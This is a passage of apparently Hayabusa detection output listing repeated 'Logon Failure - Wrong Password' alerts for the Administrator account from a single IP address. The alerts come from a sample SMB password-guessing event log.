NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: 